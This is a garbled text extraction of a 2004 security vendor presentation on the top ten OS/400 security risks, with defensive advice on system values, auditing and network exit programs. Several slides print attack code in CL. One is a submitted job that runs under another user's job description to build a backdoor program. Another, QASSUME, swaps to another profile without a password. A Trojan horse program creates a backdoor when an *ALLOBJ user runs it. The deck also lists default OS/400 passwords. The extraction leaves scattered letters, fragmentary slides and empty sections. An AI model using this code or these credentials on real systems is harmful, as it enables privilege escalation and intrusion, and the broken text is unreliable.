Академический Документы
Профессиональный Документы
Культура Документы
P R E S E N T A T I ON
Top 10 OS/400
Security Risks
October 2004
John Earl
Chief Technology Officer
info@powertechgroup.com
PowerTech/IBM Relationship
> Multi-level
info@powertechgroup.com
HACKERS!!!
www.powertech.com
or
info@powertechgroup.com
www.powertech.com
info@powertechgroup.com
www.powertech.com
info@powertechgroup.com
Conclusion
www.powertech.com
info@powertechgroup.com
User
Identity Theft
www.powertech.com
info@powertechgroup.com
User
Identity Theft
At QSECURITY level 30 and lower, the user needs only *USE (Read) authority to the
Job Description.
Example:
SBMJOB CMD(CALL PGM(QSYS/CRTCLPGM
PGM(QSYS/QBACKDOOR)
SRCFILE(MYLIB/QCLSRC)
OPTION(*NOSRC) GENOPT(*NOLIST)
USRPRF(*OWNER) LOG(*NO)
ALWRTVSRC(*NO) AUT(*ALL)))
JOB(REPORT) JOBD(QGPL/QBATCH) USER(*JOBD)
info@powertechgroup.com
User
Identity Theft
www.powertech.com
info@powertechgroup.com
10
User
Identity Theft
Program QSYS/QASSUME
!
!
!
d
e
r
o
s
n
Ce
PGM PARM(&USER)
DCL
&USER
*CHAR 10
DCL
&HANDLE
*CHAR 10
DCL
&ERROR
*CHAR
4
CHGVAR %BIN(&ERROR)
0
CALL
'QSYGETPH
PARM(&USER *NOPWD &HANDLE &ERROR)
CHGVAR %BIN(&ERROR)
0
CALL
'QWTSETP PARM(&HANDLE &ERROR)
ENDPGM
www.powertech.com
info@powertechgroup.com
11
User
Identity Theft
www.powertech.com
info@powertechgroup.com
12
User
Identity Theft
www.powertech.com
info@powertechgroup.com
13
User
Identity Theft
qsecofr
qsysopr
qpgmr
password
2222
service
1111111
2222222
qserv
qsvr
secofr
ibmce
info@powertechgroup.com
14
User
Identity Theft
Value
QPWDEXPITV
QPWDMINLEN
QPWDRQDDGT
QPWDRQDDIF
90
6
1
5
www.powertech.com
Description
90 Days
6 Character Minimum length
Require a digit
Unique in 10
info@powertechgroup.com
15
Powerful
Users
www.powertech.com
info@powertechgroup.com
16
Powerful
Users
www.powertech.com
info@powertechgroup.com
17
Powerful
Users
www.powertech.com
info@powertechgroup.com
18
System Value
Weaknesses
www.powertech.com
info@powertechgroup.com
19
System Value
Weaknesses
Signon Control
Regulate signon to prevent attacks
QDSPSGNINF
*DSCJOB
QRMTSIGN
When job is timed out, disconnect job and show signon screen.
QMAXSGNACN
30
QMAXSIGN
QINACTMSGQ
QINACTITV
*VERIFY
www.powertech.com
info@powertechgroup.com
20
System Value
Weaknesses
Malicious Programs
Prevent Malicious programs from being
loaded to your system by setting these
system values:
QALWOBJRST
QVFYOBJRST
*NONE
QFRCCVNRST
www.powertech.com
info@powertechgroup.com
21
System Value
Weaknesses
QSECURITY =
40 or 50
10 = Physical Security
20 = Password Security
30 = Resource Security
40 = Operating System Security
50 = Enhanced Operating System Security
www.powertech.com
info@powertechgroup.com
22
Libraries and
Library Lists
www.powertech.com
23
Libraries and
Library Lists
Example:
Solution:
www.powertech.com
info@powertechgroup.com
24
The Open
Door Policy
WHO IS *PUBLIC?
Any user of this computer who does not have explicit
authority to a given object.
www.powertech.com
info@powertechgroup.com
25
The Open
Door Policy
Programs, Display Files, Print Files, Work Management Objects, etc. All
static objects (those that do not contain data in one form or another) will work
for users that have only change.
Data Files, Data Areas, Data Queues, Message Queues, etc. Those things that
regularly change as a matter of normal business.
info@powertechgroup.com
26
Promiscuous
Object Ownership
www.powertech.com
info@powertechgroup.com
27
Promiscuous
Object Ownership
Line access
DFU, DBU, EZView and other Data manipulation tools
QUERY/400, SQL, and othjer query tools
Others???
www.powertech.com
info@powertechgroup.com
28
Command Line
Interface Abuse
3.
4.
5.
6.
www.powertech.com
info@powertechgroup.com
29
Command Line
Interface Abuse
www.powertech.com
info@powertechgroup.com
30
www.powertech.com
info@powertechgroup.com
Command Line
Interface Abuse
31
A Trojan
Horse
> Program QSYS/QTROJAN
www.powertech.com
QSYS/DCL
&ALLOBJ *CHAR 10
QSYS/ DCL
&COUNT *DEC
(3 0)
QSYS/ DCL
&SPCAUT *CHAR 100
QSYS/ DCL
&START *DEC
(3 0) VALUE(1)
QSYS/MONMSG CPF0000
d
e
r
o
!
!
!
QSYS/RTVUSRPRF SPCAUT(&SPCAUT)
LOOP: IF (&COUNT *LE 10)
QSYS/ CHGVAR VAR(&ALLOBJ) VALUE(%SST(&SPCAUT &START 10))
QSYS/IF
COND(&ALLOBJ = 'ALLOBJ') THEN(DO)
QSYS/CRTCLPGM PGM(QSYS/QBACKDOOR) SRCFILE(MYLIB/QCLSRC) +
OPTION(*NOSRC) GENOPT(*NOLIST) +
USRPRF(*OWNER) LOG(*NO) ALWRTVSRC(*NO) +
AUT(*ALL)
QSYS/RETURN
QSYS/ENDDO
QSYS/CHGVAR VAR(&COUNT) VALUE(&COUNT + 1)
QSYS/CHGVAR VAR(&START) VALUE(&START + 10)
QSYS/GOTO LOOP
s
n
e
C
info@powertechgroup.com
32
Trojan
Horses
info@powertechgroup.com
33
Trojan
Horses
QATNPGM
QPWDVLDPGM
QRMTSIGN
QSTRUPPGM
PCSACC
DDMACC
(WRKSYSVAL)
- Attention program
- Password validation program
- Remote sign-on control
- Startup program
(CHGNETA)
- PC Support exit point
- DDM exit point
ADDEXITPRG
www.powertech.com
info@powertechgroup.com
34
Trojan
Horses
> Subsystems
(CHGMSGD)
(CHGSBSD)
www.powertech.com
info@powertechgroup.com
35
No Audit
Ability
> What if the data was not damaged, but only stolen?
www.powertech.com
info@powertechgroup.com
36
No Audit
Ability
Why?
Its free (from IBM)
Its a comprehensive gathering tool
Its an irrefutable source of historical events.
www.powertech.com
info@powertechgroup.com
37
No Audit
Ability
QAUDCTL(*AUDLVL)
+
QAUDLVL(*AUTFAIL *CREATE *DELETE +
*JOBDTA *NETCMN *OBJMGT +
*OFCSRV *OPTICAL *PGMADP +
*PGMFAIL *PRTDTA*SAVRST +
*SECURITY *SERVICE *SPLFDTA +
*SYSMGT )
+
INLJRNRCV(SECURLIB/AUDRCV0001)
info@powertechgroup.com
38
10
Unprotected
Network Access
www.powertech.com
info@powertechgroup.com
39
10
Unprotected
Network Access
www.powertech.com
info@powertechgroup.com
40
10
Unprotected
Network Access
info@powertechgroup.com
41
10
Application Menu
CRM
www.powertech.com
info@powertechgroup.com
42
10
www.powertech.com
info@powertechgroup.com
Unprotected
Network Access
43
Unprotected
Network Access
Some of the network access methods
10
CLIENT ACCESS/400*
Windows Network
Neighborhood
Shared Folders
Shared Printers
FTP
NetServer
Get File
Put File
Delete File
Delete Library
Remote Command
DDM
Copy File
Remote Command
DRDA
Shared Folders
Etc.
info@powertechgroup.com
44
10
Unprotected
Network Access
www.powertech.com
info@powertechgroup.com
45
10
Unprotected
Network Access
Main program
Continue processing...
www.powertech.com
info@powertechgroup.com
User specified
exit program
Analyze request &
return result
(pass/fail)
2003 PowerTech Group, Inc. All rights reserved.
46
10
FTP Server
TELNET Server
Database Server
P
DDM Server
R
SQL Server
DRDA Server
File xfer Server
O
G
R
A
M
info@powertechgroup.com
47
10
DISTRIBUTORS
EMPLOYEES
Provides:
Visibility to Network
activity
Control of Network
Activity
SUPPLIERS
Security Monitoring
www.powertech.com
info@powertechgroup.com
48
Conclusions
info@powertechgroup.com
49
Thank You
Contact Info:
John Earl
Chief Technology Officer
The PowerTech Group
john.earl@powertech.com
253.872.7788 x302
www.powertech.com
info@powertechgroup.com
50